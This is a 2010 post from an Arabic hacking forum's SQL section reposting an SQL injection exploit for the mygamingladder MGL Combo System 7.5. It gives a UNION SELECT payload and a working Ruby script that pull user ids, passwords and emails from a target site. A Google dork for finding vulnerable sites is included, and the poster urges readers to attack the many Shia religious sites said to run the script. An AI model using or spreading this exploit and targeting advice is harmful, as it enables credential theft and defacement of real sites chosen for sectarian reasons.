التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-11-2010, 12:09 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره


كود PHP:
# Title: mygamingladder MGL Combo System <= 7.5 SQL injection
# EDB-ID: 12135
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Easy Laster
# Published: 2010-04-10
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
----------------------------
Information------------------------------------------------
+
Name mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability SQL injection Exploit
+Autor Easy Laster
+Date   10.04.2010
+Script  mygamingladder MGL Combo System <= 7.5
+Download : ------------------
+
Demo http://www.mygamingladder.com/upgrade/combo/
+Price 120$
+
Language PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project 4004-security-project.com
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.
 
---------------------------------------------------------------------------------------
                                                                                      
 
___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|-| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |
_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_
                                              |
___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+
Vulnerability http://www.site.com/game/news.php?newsid=
 
 
+Exploitable   http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1,
concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+
 
 
-----------------------------------------------------------------------------------------
 
#Exploit
 
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
#            4004-Security-Project                      #
#########################################################
#             mygamingladder MGL Combo System 7.5       #
#                          Exploit                      #
#                     Using Host+Path                   #
#                     www.demo.de /forum/               #
#                         Easy Laster                   #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
begin
dir 
"news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end 

الدورك

كود:
inurl:news.php?newsid=
لا وصيكم بالتنتيف

مواقع شيعيه حسينيه مركبته كثيير

تحياتي يزيد العتيبي


s;vfj mygamingladder MGL Combo System lwhf l,hru adudi ;edvi

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كما وعدتكم موسوعه كبيره لاميلات كثيره هديه لعيونكم KOOBAN Hackers Showoff 78 10-08-2010 05:58 PM
مواقع كثيره للمبتدئين للتدرب ^_* GoLdeN-z3r0 SQL قواعد البيانات 8 08-22-2010 01:17 AM
على الجميع المبادره لقصف هذه المواقع واكمال الحقن مواقع كبيره ومشهوره NEVER HaCKEr SQL قواعد البيانات 5 11-23-2009 07:04 PM


الساعة الآن 05:17 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0